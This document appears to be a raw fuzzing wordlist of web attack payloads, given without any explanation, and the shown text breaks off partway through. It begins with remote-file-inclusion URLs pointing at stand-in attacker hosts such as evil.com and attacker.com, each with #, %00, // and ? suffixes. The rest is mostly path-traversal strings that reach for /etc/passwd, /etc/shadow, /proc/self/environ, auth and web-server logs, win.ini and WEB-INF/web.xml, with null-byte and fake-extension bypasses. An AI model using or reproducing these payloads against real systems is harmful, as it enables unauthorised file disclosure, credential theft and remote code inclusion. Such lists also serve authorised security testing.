"//evil.com/shell.txt
"//evil.com/shell.txt#
"//evil.com/shell.txt%00
"//evil.com/shell.txt//
"//evil.com/shell.txt?
"http://127.0.0.1:8000/evil
"http://127.0.0.1:8000/evil#
"http://127.0.0.1:8000/evil%00
"http://127.0.0.1:8000/evil//
"http://127.0.0.1:8000/evil?
"http://attacker.com/exploit.php
"http://attacker.com/exploit.php#
"http://attacker.com/exploit.php%00
"http://attacker.com/exploit.php//
"http://attacker.com/exploit.php?
"http://evil.com/shell.txt
"http://evil.com/shell.txt#
"http://evil.com/shell.txt%00
"http://evil.com/shell.txt//
"http://evil.com/shell.txt?
"https://raw.githubusercontent.com/user/file.sh
"https://raw.githubusercontent.com/user/file.sh#
"https://raw.githubusercontent.com/user/file.sh%00
"https://raw.githubusercontent.com/user/file.sh//
"https://raw.githubusercontent.com/user/file.sh?
${url}//evil.com/shell.txt
${url}//evil.com/shell.txt#
${url}//evil.com/shell.txt%00
${url}//evil.com/shell.txt//
${url}//evil.com/shell.txt?
${url}http://127.0.0.1:8000/evil
${url}http://127.0.0.1:8000/evil#
${url}http://127.0.0.1:8000/evil%00
${url}http://127.0.0.1:8000/evil//
${url}http://127.0.0.1:8000/evil?
${url}http://attacker.com/exploit.php
${url}http://attacker.com/exploit.php#
${url}http://attacker.com/exploit.php%00
${url}http://attacker.com/exploit.php//
${url}http://attacker.com/exploit.php?
${url}http://evil.com/shell.txt
${url}http://evil.com/shell.txt#
${url}http://evil.com/shell.txt%00
${url}http://evil.com/shell.txt//
${url}http://evil.com/shell.txt?
${url}https://raw.githubusercontent.com/user/file.sh
${url}https://raw.githubusercontent.com/user/file.sh#
${url}https://raw.githubusercontent.com/user/file.sh%00
${url}https://raw.githubusercontent.com/user/file.sh//
${url}https://raw.githubusercontent.com/user/file.sh?
'//evil.com/shell.txt
'//evil.com/shell.txt#
'//evil.com/shell.txt%00
'//evil.com/shell.txt//
'//evil.com/shell.txt?
'http://127.0.0.1:8000/evil
'http://127.0.0.1:8000/evil#
'http://127.0.0.1:8000/evil%00
'http://127.0.0.1:8000/evil//
'http://127.0.0.1:8000/evil?
'http://attacker.com/exploit.php
'http://attacker.com/exploit.php#
'http://attacker.com/exploit.php%00
'http://attacker.com/exploit.php//
'http://attacker.com/exploit.php?
'http://evil.com/shell.txt
'http://evil.com/shell.txt#
'http://evil.com/shell.txt%00
'http://evil.com/shell.txt//
'http://evil.com/shell.txt?
'https://raw.githubusercontent.com/user/file.sh
'https://raw.githubusercontent.com/user/file.sh#
'https://raw.githubusercontent.com/user/file.sh%00
'https://raw.githubusercontent.com/user/file.sh//
'https://raw.githubusercontent.com/user/file.sh?
...//WEB-INF/web.xml
...//WEB-INF/web.xml%00
...//WEB-INF/web.xml.%00
...//WEB-INF/web.xml.%00.png
...//WEB-INF/web.xml.asp
...//WEB-INF/web.xml.bak
...//WEB-INF/web.xml.conf
...//WEB-INF/web.xml.html
...//WEB-INF/web.xml.inc
...//WEB-INF/web.xml.jsp
...//WEB-INF/web.xml.log
...//WEB-INF/web.xml.old
...//WEB-INF/web.xml.php
...//WEB-INF/web.xml.txt
...//boot.ini
...//boot.ini%00
...//boot.ini.%00
...//boot.ini.%00.png
...//boot.ini.asp
...//boot.ini.bak
...//boot.ini.conf
...//boot.ini.html
...//boot.ini.inc
...//boot.ini.jsp
...//boot.ini.log
...//boot.ini.old
...//boot.ini.php
...//boot.ini.txt
...//etc/hostname
...//etc/hostname%00
...//etc/hostname.%00
...//etc/hostname.%00.png
...//etc/hostname.asp
...//etc/hostname.bak
...//etc/hostname.conf
...//etc/hostname.html
...//etc/hostname.inc
...//etc/hostname.jsp
...//etc/hostname.log
...//etc/hostname.old
...//etc/hostname.php
...//etc/hostname.txt
...//etc/hosts
...//etc/hosts%00
...//etc/hosts.%00
...//etc/hosts.%00.png
...//etc/hosts.asp
...//etc/hosts.bak
...//etc/hosts.conf
...//etc/hosts.html
...//etc/hosts.inc
...//etc/hosts.jsp
...//etc/hosts.log
...//etc/hosts.old
...//etc/hosts.php
...//etc/hosts.txt
...//etc/passwd
...//etc/passwd%00
...//etc/passwd.%00
...//etc/passwd.%00.png
...//etc/passwd.asp
...//etc/passwd.bak
...//etc/passwd.conf
...//etc/passwd.html
...//etc/passwd.inc
...//etc/passwd.jsp
...//etc/passwd.log
...//etc/passwd.old
...//etc/passwd.php
...//etc/passwd.txt
...//etc/shadow
...//etc/shadow%00
...//etc/shadow.%00
...//etc/shadow.%00.png
...//etc/shadow.asp
...//etc/shadow.bak
...//etc/shadow.conf
...//etc/shadow.html
...//etc/shadow.inc
...//etc/shadow.jsp
...//etc/shadow.log
...//etc/shadow.old
...//etc/shadow.php
...//etc/shadow.txt
...//proc/self/environ
...//proc/self/environ%00
...//proc/self/environ.%00
...//proc/self/environ.%00.png
...//proc/self/environ.asp
...//proc/self/environ.bak
...//proc/self/environ.conf
...//proc/self/environ.html
...//proc/self/environ.inc
...//proc/self/environ.jsp
...//proc/self/environ.log
...//proc/self/environ.old
...//proc/self/environ.php
...//proc/self/environ.txt
...//var/log/auth.log
...//var/log/auth.log%00
...//var/log/auth.log.%00
...//var/log/auth.log.%00.png
...//var/log/auth.log.asp
...//var/log/auth.log.bak
...//var/log/auth.log.conf
...//var/log/auth.log.html
...//var/log/auth.log.inc
...//var/log/auth.log.jsp
...//var/log/auth.log.log
...//var/log/auth.log.old
...//var/log/auth.log.php
...//var/log/auth.log.txt
...//var/log/nginx/access.log
...//var/log/nginx/access.log%00
...//var/log/nginx/access.log.%00
...//var/log/nginx/access.log.%00.png
...//var/log/nginx/access.log.asp
...//var/log/nginx/access.log.bak
...//var/log/nginx/access.log.conf
...//var/log/nginx/access.log.html
...//var/log/nginx/access.log.inc
...//var/log/nginx/access.log.jsp
...//var/log/nginx/access.log.log
...//var/log/nginx/access.log.old
...//var/log/nginx/access.log.php
...//var/log/nginx/access.log.txt
...//windows/win.ini
...//windows/win.ini%00
...//windows/win.ini.%00
...//windows/win.ini.%00.png
...//windows/win.ini.asp
...//windows/win.ini.bak
...//windows/win.ini.conf
...//windows/win.ini.html
...//windows/win.ini.inc
...//windows/win.ini.jsp
...//windows/win.ini.log
...//windows/win.ini.old
...//windows/win.ini.php
...//windows/win.ini.txt
../../../../../../../../..//WEB-INF/web.xml
../../../../../../../../..//WEB-INF/web.xml%00
../../../../../../../../..//WEB-INF/web.xml.%00
../../../../../../../../..//WEB-INF/web.xml.%00.png
../../../../../../../../..//WEB-INF/web.xml.asp
../../../../../../../../..//WEB-INF/web.xml.bak
../../../../../../../../..//WEB-INF/web.xml.conf
../../../../../../../../..//WEB-INF/web.xml.html
../../../../../../../../..//WEB-INF/web.xml.inc
../../../../../../../../..//WEB-INF/web.xml.jsp
../../../../../../../../..//WEB-INF/web.xml.log
../../../../../../../../..//WEB-INF/web.xml.old
../../../../../../../../..//WEB-INF/web.xml.php
../../../../../../../../..//WEB-INF/web.xml.txt
../../../../../../../../..//boot.ini
../../../../../../../../..//boot.ini%00
../../../../../../../../..//boot.ini.%00
../../../../../../../../..//boot.ini.%00.png
../../../../../../../../..//boot.ini.asp
../../../../../../../../..//boot.ini.bak
../../../../../../../../..//boot.ini.conf
../../../../../../../../..//boot.ini.html
../../../../../../../../..//boot.ini.inc
../../../../../../../../..//boot.ini.jsp
../../../../../../../../..//boot.ini.log
../../../../../../../../..//boot.ini.old
../../../../../../../../..//boot.ini.php
../../../../../../../../..//boot.ini.txt
../../../../../../../../..//etc/hostname
../../../../../../../../..//etc/hostname%00
../../../../../../../../..//etc/hostname.%00
../../../../../../../../..//etc/hostname.%00.png
../../../../../../../../..//etc/hostname.asp
../../../../../../../../..//etc/hostname.bak
../../../../../../../../..//etc/hostname.conf
../../../../../../../../..//etc/hostname.html
../../../../../../../../..//etc/hostname.inc
../../../../../../../../..//etc/hostname.jsp
../../../../../../../../..//etc/hostname.log
../../../../../../../../..//etc/hostname.old
../../../../../../../../..//etc/hostname.php
../../../../../../../../..//etc/hostname.txt
../../../../../../../../..//etc/hosts
../../../../../../../../..//etc/hosts%00
../../../../../../../../..//etc/hosts.%00
../../../../../../../../..//etc/hosts.%00.png
../../../../../../../../..//etc/hosts.asp
../../../../../../../../..//etc/hosts.bak
../../../../../../../../..//etc/hosts.conf
../../../../../../../../..//etc/hosts.html
../../../../../../../../..//etc/hosts.inc
../../../../../../../../..//etc/hosts.jsp
../../../../../../../../..//etc/hosts.log
../../../../../../../../..//etc/hosts.old
../../../../../../../../..//etc/hosts.php
../../../../../../../../..//etc/hosts.txt
../../../../../../../../..//etc/passwd
../../../../../../../../..//etc/passwd%00
../../../../../../../../..//etc/passwd.%00
../../../../../../../../..//etc/passwd.%00.png
../../../../../../../../..//etc/passwd.asp
../../../../../../../../..//etc/passwd.bak
../../../../../../../../..//etc/passwd.conf
../../../../../../../../..//etc/passwd.html
../../../../../../../../..//etc/passwd.inc
../../../../../../../../..//etc/passwd.jsp
../../../../../../../../..//etc/passwd.log
../../../../../../../../..//etc/passwd.old
../../../../../../../../..//etc/passwd.php
../../../../../../../../..//etc/passwd.txt
../../../../../../../../..//etc/shadow
../../../../../../../../..//etc/shadow%00
../../../../../../../../..//etc/shadow.%00
../../../../../../../../..//etc/shadow.%00.png
../../../../../../../../..//etc/shadow.asp
../../../../../../../../..//etc/shadow.bak
../../../../../../../../..//etc/shadow.conf
../../../../../../../../..//etc/shadow.html
../../../../../../../../..//etc/shadow.inc
../../../../../../../../..//etc/shadow.jsp
../../../../../../../../..//etc/shadow.log
../../../../../../../../..//etc/shadow.old
../../../../../../../../..//etc/shadow.php
../../../../../../../../..//etc/shadow.txt
../../../../../../../../..//proc/self/environ
../../../../../../../../..//proc/self/environ%00
../../../../../../../../..//proc/self/environ.%00
../../../../../../../../..//proc/self/environ.%00.png
../../../../../../../../..//proc/self/environ.asp
../../../../../../../../..//proc/self/environ.bak
../../../../../../../../..//proc/self/environ.conf
../../../../../../../../..//proc/self/environ.html
../../../../../../../../..//proc/self/environ.inc
../../../../../../../../..//proc/self/environ.jsp
../../../../../../../../..//proc/self/environ.log
../../../../../../../../..//proc/self/environ.old
../../../../../../../../..//proc/self/environ.php
../../../../../../../../..//proc/self/environ.txt
../../../../../../../../..//var/log/auth.log
../../../../../../../../..//var/log/auth.log%00
../../../../../../../../..//var/log/auth.log.%00
../../../../../../../../..//var/log/auth.log.%00.png
../../../../../../../../..//var/log/auth.log.asp
../../../../../../../../..//var/log/auth.log.bak
../../../../../../../../..//var/log/auth.log.conf
../../../../../../../../..//var/log/auth.log.html
../../../../../../../../..//var/log/auth.log.inc
../../../../../../../../..//var/log/auth.log.jsp
../../../../../../../../..//var/log/auth.log.log
../../../../../../../../..//var/log/auth.log.old
../../../../../../../../..//var/log/auth.log.php
../../../../../../../../..//var/log/auth.log.txt
../../../../../../../../..//var/log/nginx/access.log
../../../../../../../../..//var/log/nginx/access.log%00
../../../../../../../../..//var/log/nginx/access.log.%00
../../../../../../../../..//var/log/nginx/access.log.%00.png
../../../../../../../../..//var/log/nginx/access.log.asp
../../../../../../../../..//var/log/nginx/access.log.bak
../../../../../../../../..//var/log/nginx/access.log.conf
../../../../../../../../..//var/log/nginx/access.log.html
../../../../../../../../..//var/log/nginx/access.log.inc
../../../../../../../../..//var/log/nginx/access.log.jsp
../../../../../../../../..//var/log/nginx/access.log.log
../../../../../../../../..//var/log/nginx/access.log.old
../../../../../../../../..//var/log/nginx/access.log.php
../../../../../../../../..//var/log/nginx/access.log.txt
../../../../../../../../..//windows/win.ini
../../../../../../../../..//windows/win.ini%00
../../../../../../../../..//windows/win.ini.%00
../../../../../../../../..//windows/win.ini.%00.png
../../../../../../../../..//windows/win.ini.asp
../../../../../../../../..//windows/win.ini.bak
../../../../../../../../..//windows/win.ini.conf
../../../../../../../../..//windows/win.ini.html
../../../../../../../../..//windows/win.ini.inc
../../../../../../../../..//windows/win.ini.jsp
../../../../../../../../..//windows/win.ini.log
../../../../../../../../..//windows/win.ini.old
../../../../../../../../..//windows/win.ini.php
../../../../../../../../..//windows/win.ini.txt
../../../../../../../..//WEB-INF/web.xml
../../../../../../../..//WEB-INF/web.xml%00
../../../../../../../..//WEB-INF/web.xml.%00
../../../../../../../..//WEB-INF/web.xml.%00.png
../../../../../../../..//WEB-INF/web.xml.asp
../../../../../../../..//WEB-INF/web.xml.bak
../../../../../../../..//WEB-INF/web.xml.conf
../../../../../../../..//WEB-INF/web.xml.html
../../../../../../../..//WEB-INF/web.xml.inc
../../../../../../../..//WEB-INF/web.xml.jsp
../../../../../../../..//WEB-INF/web.xml.log
../../../../../../../..//WEB-INF/web.xml.old
../../../../../../../..//WEB-INF/web.xml.php
../../../../../../../..//WEB-INF/web.xml.txt
../../../../../../../..//boot.ini
../../../../../../../..//boot.ini%00
../../../../../../../..//boot.ini.%00
../../../../../../../..//boot.ini.%00.png
../../../../../../../..//boot.ini.asp
../../../../../../../..//boot.ini.bak
../../../../../../../..//boot.ini.conf
../../../../../../../..//boot.ini.html
../../../../../../../..//boot.ini.inc
../../../../../../../..//boot.ini.jsp
../../../../../../../..//boot.ini.log
../../../../../../../..//boot.ini.old
../../../../../../../..//boot.ini.php
../../../../../../../..//boot.ini.txt
../../../../../../../..//etc/hostname
../../../../../../../..//etc/hostname%00
../../../../../../../..//etc/hostname.%00
../../../../../../../..//etc/hostname.%00.png
../../../../../../../..//etc/hostname.asp
../../../../../../../..//etc/hostname.bak
../../../../../../../..//etc/hostname.conf
../../../../../../../..//etc/hostname.html
../../../../../../../..//etc/hostname.inc
../../../../../../../..//etc/hostname.jsp
../../../../../../../..//etc/hostname.log
../../../../../../../..//etc/hostname.old
../../../../../../../..//etc/hostname.php
../../../../../../../..//etc/hostname.txt
../../../../../../../..//etc/hosts
../../../../../../../..//etc/hosts%00
../../../../../../../..//etc/hosts.%00
../../../../../../../..//etc/hosts.%00.png
../../../../../../../..//etc/hosts.asp
../../../../../../../..//etc/hosts.bak
../../../../../../../..//etc/hosts.conf
../../../../../../../..//etc/hosts.html
../../../../../../../..//etc/hosts.inc
../../../../../../../..//etc/hosts.jsp
../../../../../../../..//etc/hosts.log
../../../../../../../..//etc/hosts.old
../../../../../../../..//etc/hosts.php
../../../../../../../..//etc/hosts.txt
../../../../../../../..//etc/passwd
../../../../../../../..//etc/passwd%00
../../../../../../../..//etc/passwd.%00
../../../../../../../..//etc/passwd.%00.png
../../../../../../../..//etc/passwd.asp
../../../../../../../..//etc/passwd.bak
../../../../../../../..//etc/passwd.conf
../../../../../../../..//etc/passwd.html
../../../../../../../..//etc/passwd.inc
../../../../../../../..//etc/passwd.jsp
../../../../../../../..//etc/passwd.log
../../../../../../../..//etc/passwd.old
../../../../../../../..//etc/passwd.php
../../../../../../../..//etc/passwd.txt
../../../../../../../..//etc/shadow
../../../../../../../..//etc/shadow%00
../../../../../../../..//etc/shadow.%00
../../../../../../../..//etc/shadow.%00.png
../../../../../../../..//etc/shadow.asp
../../../../../../../..//etc/shadow.bak
../../../../../../../..//etc/shadow.conf
../../../../../../../..//etc/shadow.html
../../../../../../../..//etc/shadow.inc
../../../../../../../..//etc/shadow.jsp
../../../../../../../..//etc/shadow.log
../../../../../../../..//etc/shadow.old
../../../../../../../..//etc/shadow.php
../../../../../../../..//etc/shadow.txt
../../../../../../../..//proc/self/environ
../../../../../../../..//proc/self/environ%00
../../../../../../../..//proc/self/environ.%00
../../../../../../../..//proc/self/environ.%00.png
../../../../../../../..//proc/self/environ.asp
../../../../../../../..//proc/self/environ.bak
../../../../../../../..//proc/self/environ.conf
../../../../../../../..//proc/self/environ.html
../../../../../../../..//proc/self/environ.inc
../../../../../../../..//proc/self/environ.jsp
../../../../../../../..//proc/self/environ.log
../../../../../../../..//proc/self/environ.old
../../../../../../../..//proc/self/environ.php
../../../../../../../..//proc/self/environ.txt
../../../../../../../..//var/log/auth.log
../../../../../../../..//var/log/auth.log%00
../../../../../../../..//var/log/auth.log.%00
../../../../../../../..//var/log/auth.log.%00.png
../../../../../../../..//var/log/auth.log.asp
../../../../../../../..//var/log/auth.log.bak
../../../../../../../..//var/log/auth.log.conf
../../../../../../../..//var/log/auth.log.html
../../../../../../../..//var/log/auth.log.inc
../../../../../../../..//var/log/auth.log.jsp
../../../../../../../..//var/log/auth.log.log
../../../../../../../..//var/log/auth.log.old
../../../../../../../..//var/log/auth.log.php
../../../../../../../..//var/log/auth.log.txt
../../../../../../../..//var/log/nginx/access.log
../../../../../../../..//var/log/nginx/access.log%00
../../../../../../../..//var/log/nginx/access.log.%00
../../../../../../../..//var/log/nginx/access.log.%00.png
../../../../../../../..//var/log/nginx/access.log.asp
../../../../../../../..//var/log/nginx/access.log.bak
../../../../../../../..//var/log/nginx/access.log.conf
../../../../../../../..//var/log/nginx/access.log.html
../../../../../../../..//var/log/nginx/access.log.inc
../../../../../../../..//var/log/nginx/access.log.jsp
../../../../../../../..//var/log/nginx/access.log.log
../../../../../../../..//var/log/nginx/access.log.old
../../../../../../../..//var/log/nginx/access.log.php
../../../../../../../..//var/log/nginx/access.log.txt
../../../../../../../..//windows/win.ini
../../../../../../../..//windows/win.ini%00
../../../../../../../..//windows/win.ini.%00
../../../../../../../..//windows/win.ini.%00.png
../../../../../../../..//windows/win.ini.asp
../../../../../../../..//windows/win.ini.bak
../../../../../../../..//windows/win.ini.conf
../../../../../../../..//windows/win.ini.html
../../../../../../../..//windows/win.ini.inc
../../../../../../../..//windows/win.ini.jsp
../../../../../../../..//windows/win.ini.log
../../../../../../../..//windows/win.ini.old
../../../../../../../..//windows/win.ini.php
../../../../../../../..//windows/win.ini.txt
../../../../../../..//WEB-INF/web.xml
../../../../../../..//WEB-INF/web.xml%00
../../../../../../..//WEB-INF/web.xml.%00
../../../../../../..//WEB-INF/web.xml.%00.png
../../../../../../..//WEB-INF/web.xml.asp
../../../../../../..//WEB-INF/web.xml.bak
../../../../../../..//WEB-INF/web.xml.conf
../../../../../../..//WEB-INF/web.xml.html
../../../../../../..//WEB-INF/web.xml.inc
../../../../../../..//WEB-INF/web.xml.jsp
../../../../../../..//WEB-INF/web.xml.log
../../../../../../..//WEB-INF/web.xml.old
../../../../../../..//WEB-INF/web.xml.php
../../../../../../..//WEB-INF/web.xml.txt
../../../../../../..//boot.ini
../../../../../../..//boot.ini%00
../../../../../../..//boot.ini.%00
../../../../../../..//boot.ini.%00.png
../../../../../../..//boot.ini.asp
../../../../../../..//boot.ini.bak
../../../../../../..//boot.ini.conf
../../../../../../..//boot.ini.html
../../../../../../..//boot.ini.inc
../../../../../../..//boot.ini.jsp
../../../../../../..//boot.ini.log
../../../../../../..//boot.ini.old
../../../../../../..//boot.ini.php
../../../../../../..//boot.ini.txt
../../../../../../..//etc/hostname
../../../../../../..//etc/hostname%00
../../../../../../..//etc/hostname.%00
../../../../../../..//etc/hostname.%00.png
../../../../../../..//etc/hostname.asp
../../../../../../..//etc/hostname.bak
../../../../../../..//etc/hostname.conf
../../../../../../..//etc/hostname.html
../../../../../../..//etc/hostname.inc
../../../../../../..//etc/hostname.jsp
../../../../../../..//etc/hostname.log
../../../../../../..//etc/hostname.old
../../../../../../..//etc/hostname.php
../../../../../../..//etc/hostname.txt
../../../../../../..//etc/hosts
../../../../../../..//etc/hosts%00
../../../../../../..//etc/hosts.%00
../../../../../../..//etc/hosts.%00.png
../../../../../../..//etc/hosts.asp
../../../../../../..//etc/hosts.bak
../../../../../../..//etc/hosts.conf
../../../../../../..//etc/hosts.html
../../../../../../..//etc/hosts.inc
../../../../../../..//etc/hosts.jsp
../../../../../../..//etc/hosts.log
../../../../../../..//etc/hosts.old
../../../../../../..//etc/hosts.php
../../../../../../..//etc/hosts.txt
../../../../../../..//etc/passwd
../../../../../../..//etc/passwd%00
../../../../../../..//etc/passwd.%00
../../../../../../..//etc/passwd.%00.png
../../../../../../..//etc/passwd.asp
../../../../../../..//etc/passwd.bak
../../../../../../..//etc/passwd.conf
../../../../../../..//etc/passwd.html
../../../../../../..//etc/passwd.inc
../../../../../../..//etc/passwd.jsp
../../../../../../..//etc/passwd.log
../../../../../../..//etc/passwd.old
../../../../../../..//etc/passwd.php
../../../../../../..//etc/passwd.txt
../../../../../../..//etc/shadow
../../../../../../..//etc/shadow%00
../../../../../../..//etc/shadow.%00
../../../../../../..//etc/shadow.%00.png
../../../../../../..//etc/shadow.asp
../../../../../../..//etc/shadow.bak
../../../../../../..//etc/shadow.conf
../../../../../../..//etc/shadow.html
../../../../../../..//etc/shadow.inc
../../../../../../..//etc/shadow.jsp
../../../../../../..//etc/shadow.log
../../../../../../..//etc/shadow.old
../../../../../../..//etc/shadow.php
../../../../../../..//etc/shadow.txt
../../../../../../..//proc/self/environ
../../../../../../..//proc/self/environ%00
../../../../../../..//proc/self/environ.%00
../../../../../../..//proc/self/environ.%00.png
../../../../../../..//proc/self/environ.asp
../../../../../../..//proc/self/environ.bak
../../../../../../..//proc/self/environ.conf
../../../../../../..//proc/self/environ.html
../../../../../../..//proc/self/environ.inc
../../../../../../..//proc/self/environ.jsp
../../../../../../..//proc/self/environ.log
../../../../../../..//proc/self/environ.old
../../../../../../..//proc/self/environ.php
../../../../../../..//proc/self/environ.txt
../../../../../../..//var/log/auth.log
../../../../../../..//var/log/auth.log%00
../../../../../../..//var/log/auth.log.%00
../../../../../../..//var/log/auth.log.%00.png
../../../../../../..//var/log/auth.log.asp
../../../../../../..//var/log/auth.log.bak
../../../../../../..//var/log/auth.log.conf
../../../../../../..//var/log/auth.log.html
../../../../../../..//var/log/auth.log.inc
../../../../../../..//var/log/auth.log.jsp
../../../../../../..//var/log/auth.log.log
../../../../../../..//var/log/auth.log.old
../../../../../../..//var/log/auth.log.php
../../../../../../..//var/log/auth.log.txt
../../../../../../..//var/log/nginx/access.log
../../../../../../..//var/log/nginx/access.log%00
../../../../../../..//var/log/nginx/access.log.%00
../../../../../../..//var/log/nginx/access.log.%00.png
../../../../../../..//var/log/nginx/access.log.asp
../../../../../../..//var/log/nginx/access.log.bak
../../../../../../..//var/log/nginx/access.log.conf
../../../../../../..//var/log/nginx/access.log.html
../../../../../../..//var/log/nginx/access.log.inc
../../../../../../..//var/log/nginx/access.log.jsp
../../../../../../..//var/log/nginx/access.log.log
../../../../../../..//var/log/nginx/access.log.old
../../../../../../..//var/log/nginx/access.log.php
../../../../../../..//var/log/nginx/access.log.txt
../../../../../../..//windows/win.ini
../../../../../../..//windows/win.ini%00
../../../../../../..//windows/win.ini.%00
../../../../../../..//windows/win.ini.%00.png
../../../../../../..//windows/win.ini.asp
../../../../../../..//windows/win.ini.bak
../../../../../../..//windows/win.ini.conf
../../../../../../..//windows/win.ini.html
../../../../../../..//windows/win.ini.inc
../../../../../../..//windows/win.ini.jsp
../../../../../../..//windows/win.ini.log
../../../../../../..//windows/win.ini.old
../../../../../../..//windows/win.ini.php
../../../../../../..//windows/win.ini.txt
../../../../../..//WEB-INF/web.xml
../../../../../..//WEB-INF/web.xml%00
../../../../../..//WEB-INF/web.xml.%00
../../../../../..//WEB-INF/web.xml.%00.png
../../../../../..//WEB-INF/web.xml.asp
../../../../../..//WEB-INF/web.xml.bak
../../../../../..//WEB-INF/web.xml.conf
../../../../../..//WEB-INF/web.xml.html
../../../../../..//WEB-INF/web.xml.inc
../../../../../..//WEB-INF/web.xml.jsp
../../../../../..//WEB-INF/web.xml.log
../../../../../..//WEB-INF/web.xml.old
../../../../../..//WEB-INF/web.xml.php
../../../../../..//WEB-INF/web.xml.txt
../../../../../..//boot.ini
../../../../../..//boot.ini%00
../../../../../..//boot.ini.%00
../../../../../..//boot.ini.%00.png
../../../../../..//boot.ini.asp
../../../../../..//boot.ini.bak
../../../../../..//boot.ini.conf
../../../../../..//boot.ini.html
../../../../../..//boot.ini.inc
../../../../../..//boot.ini.jsp
../../../../../..//boot.ini.log
../../../../../..//boot.ini.old
../../../../../..//boot.ini.php
../../../../../..//boot.ini.txt
../../../../../..//etc/hostname
../../../../../..//etc/hostname%00
../../../../../..//etc/hostname.%00
../../../../../..//etc/hostname.%00.png
../../../../../..//etc/hostname.asp
../../../../../..//etc/hostname.bak
../../../../../..//etc/hostname.conf
../../../../../..//etc/hostname.html
../../../../../..//etc/hostname.inc
../../../../../..//etc/hostname.jsp
../../../../../..//etc/hostname.log
../../../../../..//etc/hostname.old
../../../../../..//etc/hostname.php
../../../../../..//etc/hostname.txt
../../../../../..//etc/hosts
../../../../../..//etc/hosts%00
../../../../../..//etc/hosts.%00
../../../../../..//etc/hosts.%00.png
../../../../../..//etc/hosts.asp
../../../../../..//etc/hosts.bak
../../../../../..//etc/hosts.conf
../../../../../..//etc/hosts.html
../../../../../..//etc/hosts.inc
../../../../../..//etc/hosts.jsp
../../../../../..//etc/hosts.log
../../../../../..//etc/hosts.old
../../../../../..//etc/hosts.php
../../../../../..//etc/hosts.txt
../../../../../..//etc/passwd
../../../../../..//etc/passwd%00
../../../../../..//etc/passwd.%00
../../../../../..//etc/passwd.%00.png
../../../../../..//etc/passwd.asp
../../../../../..//etc/passwd.bak
../../../../../..//etc/passwd.conf
../../../../../..//etc/passwd.html
../../../../../..//etc/passwd.inc
../../../../../..//etc/passwd.jsp
../../../../../..//etc/passwd.log
../../../../../..//etc/passwd.old
../../../../../..//etc/passwd.php
../../../../../..//etc/passwd.txt
../../../../../..//etc/shadow
../../../../../..//etc/shadow%00
../../../../../..//etc/shadow.%00
../../../../../..//etc/shadow.%00.png
../../../../../..//etc/shadow.asp
../../../../../..//etc/shadow.bak
../../../../../..//etc/shadow.conf
../../../../../..//etc/shadow.html
../../../../../..//etc/shadow.inc
../../../../../..//etc/shadow.jsp
../../../../../..//etc/shadow.log
../../../../../..//etc/shadow.old
../../../../../..//etc/shadow.php
../../../../../..//etc/shadow.txt
../../../../../..//proc/self/environ
../../../../../..//proc/self/environ%00
../../../../../..//proc/self/environ.%00
../../../../../..//proc/self/environ.%00.png
../../../../../..//proc/self/environ.asp
../../../../../..//proc/self/environ.bak
../../../../../..//proc/self/environ.conf
../../../../../..//proc/self/environ.html
../../../../../..//proc/self/environ.inc
../../../../../..//proc/self/environ.jsp
../../../../../..//proc/self/environ.log
../../../../../..//proc/self/environ.old
../../../../../..//proc/self/environ.php
../../../../../..//proc/self/environ.txt
../../../../../..//var/log/auth.log
../../../../../..//var/log/auth.log%00
../../../../../..//var/log/auth.log.%00
../../../../../..//var/log/auth.log.%00.png
../../../../../..//var/log/auth.log.asp
../../../../../..//var/log/auth.log.bak
../../../../../..//var/log/auth.log.conf
../../../../../..//var/log/auth.log.html
../../../../../..//var/log/auth.log.inc
../../../../../..//var/log/auth.log.jsp
../../../../../..//var/log/auth.log.log
../../../../../..//var/log/auth.log.old
../../../../../..//var/log/auth.log.php
../../../../../..//var/log/auth.log.txt
../../../../../..//var/log/nginx/access.log
../../../../../..//var/log/nginx/access.log%00
../../../../../..//var/log/nginx/access.log.%00
../../../../../..//var/log/nginx/access.log.%00.png
../../../../../..//var/log/nginx/access.log.asp
../../../../../..//var/log/nginx/access.log.bak
../../../../../..//var/log/nginx/access.log.conf
../../../../../..//var/log/nginx/access.log.html
../../../../../..//var/log/nginx/access.log.inc
../../../../../..//var/log/nginx/access.log.jsp
../../../../../..//var/log/nginx/access.log.log
../../../../../..//var/log/nginx/access.log.old
../../../../../..//var/log/nginx/access.log.php
../../../../../..//var/log/nginx/access.log.txt
../../../../../..//windows/win.ini
../../../../../..//windows/win.ini%00
../../../../../..//windows/win.ini.%00
../../../../../..//windows/win.ini.%00.png
../../../../../..//windows/win.ini.asp
../../../../../..//windows/win.ini.bak
../../../../../..//windows/win.ini.conf
../../../../../..//windows/win.ini.html
../../../../../..//windows/win.ini.inc
../../../../../..//windows/win.ini.jsp
../../../../../..//windows/win.ini.log
../../../../../..//windows/win.ini.old
../../../../../..//windows/win.ini.php
../../../../../..//windows/win.ini.txt
../../../../..//WEB-INF/web.xml
../../../../..//WEB-INF/web.xml%00
../../../../..//WEB-INF/web.xml.%00
../../../../..//WEB-INF/web.xml.%00.png
../../../../..//WEB-INF/web.xml.asp
../../../../..//WEB-INF/web.xml.bak
../../../../..//WEB-INF/web.xml.conf
../../../../..//WEB-INF/web.xml.html
../../../../..//WEB-INF/web.xml.inc
../../../../..//WEB-INF/web.xml.jsp
../../../../..//WEB-INF/web.xml.log
../../../../..//WEB-INF/web.xml.old
../../../../..//WEB-INF/web.xml.php
../../../../..//WEB-INF/web.xml.txt
../../../../..//boot.ini
../../../../..//boot.ini%00
../../../../..//boot.ini.%00
../../../../..//boot.ini.%00.png
../../../../..//boot.ini.asp
../../../../..//boot.ini.bak
../../../../..//boot.ini.conf
../../../../..//boot.ini.html
../../../../..//boot.ini.inc
../../../../..//boot.ini.jsp
../../../../..//boot.ini.log
../../../../..//boot.ini.old
../../../../..//boot.ini.php
../../../../..//boot.ini.txt
../../../../..//etc/hostname
../../../../..//etc/hostname%00
../../../../..//etc/hostname.%00
../../../../..//etc/hostname.%00.png
../../../../..//etc/hostname.asp
../../../../..//etc/hostname.bak
../../../../..//etc/hostname.conf
../../../../..//etc/hostname.html
../../../../..//etc/hostname.inc
../../../../..//etc/hostname.jsp
../../../../..//etc/hostname.log
../../../../..//etc/hostname.old
../../../../..//etc/hostname.php
../../../../..//etc/hostname.txt
../../../../..//etc/hosts
../../../../..//etc/hosts%00
../../../../..//etc/hosts.%00
../../../../..//etc/hosts.%00.png
../../../../..//etc/hosts.asp
../../../../..//etc/hosts.bak
../../../../..//etc/hosts.conf
../../../../..//etc/hosts.html
../../../../..//etc/hosts.inc
../../../../..//etc/hosts.jsp
../../../../..//etc/hosts.log
../../../../..//etc/hosts.old
../../../../..//etc/hosts.php
../../../../..//etc/hosts.txt
../../../../..//etc/passwd
../../../../..//etc/passwd%00
